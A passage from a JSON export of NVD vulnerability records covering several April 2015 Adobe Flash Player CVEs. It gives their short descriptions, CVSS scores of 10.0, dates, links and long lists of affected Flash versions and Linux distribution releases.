"cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", 
"cpe:2.3:o:redhat:enterprise_linux_server_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:00", "description": "Double free vulnerability in Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-0346.\n<a href=\"http://cwe.mitre.org/data/definitions/415.html\">CWE-415: Double Free</a>", "edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", "title": "CVE-2015-0359", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0359"], "modified": "2017-10-07T01:29:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", 
"cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-0359", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0359", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:03", "description": "Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038, CVE-2015-3041, and CVE-2015-3043.", "edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", "title": "CVE-2015-3042", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3042"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/o:suse:suse_linux_enterprise_desktop:12.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.6.z", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/o:suse:suse_linux_enterprise_desktop:11.0", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/o:suse:suse_linux_workstation_extension:12.0", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3042", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3042", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", 
"cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:00", "description": "Double free vulnerability in Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability 
than CVE-2015-0359.\n<a href=\"http://cwe.mitre.org/data/definitions/415.html\">CWE-415: Double Free</a>", "edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", "title": "CVE-2015-0346", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0346"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/o:suse:suse_linux_enterprise_desktop:12.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.6.z", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/o:suse:suse_linux_enterprise_desktop:11.0", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/o:suse:suse_linux_workstation_extension:12.0", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", 
"cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-0346", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0346", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:03", "description": "Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, as exploited in the wild in April 2015, a different vulnerability than CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038, CVE-2015-3041, and CVE-2015-3042.", "edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", "title": "CVE-2015-3043", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3043"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/o:novell:suse_linux_enterprise_desktop:11.0", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/o:redhat:enterprise_linux_supplementary:5.0", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.6.z", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", 
"cpe:/o:opensuse:opensuse:13.2", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3043", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3043", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0:client:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", 
"cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_supplementary:5.0:server:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:00", "description": "Use-after-free vulnerability in Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-0349, CVE-2015-0358, and CVE-2015-3039.\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", "title": "CVE-2015-0351", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0351"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", 
"cpe:/o:opensuse:opensuse:13.1", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/o:suse:suse_linux_enterprise_desktop:12.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.6.z", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/o:suse:suse_linux_enterprise_desktop:11.0", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/o:suse:suse_linux_workstation_extension:12.0", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-0351", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0351", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", 
"cpe:2.3:o:suse:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:00", "description": "Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-0347, CVE-2015-0352, CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038, CVE-2015-3041, CVE-2015-3042, and CVE-2015-3043.", "edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", "title": "CVE-2015-0350", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, 
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0350"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/o:suse:suse_linux_enterprise_desktop:12.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.6.z", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/o:suse:suse_linux_enterprise_desktop:11.0", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/o:suse:suse_linux_workstation_extension:12.0", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-0350", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0350", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", 
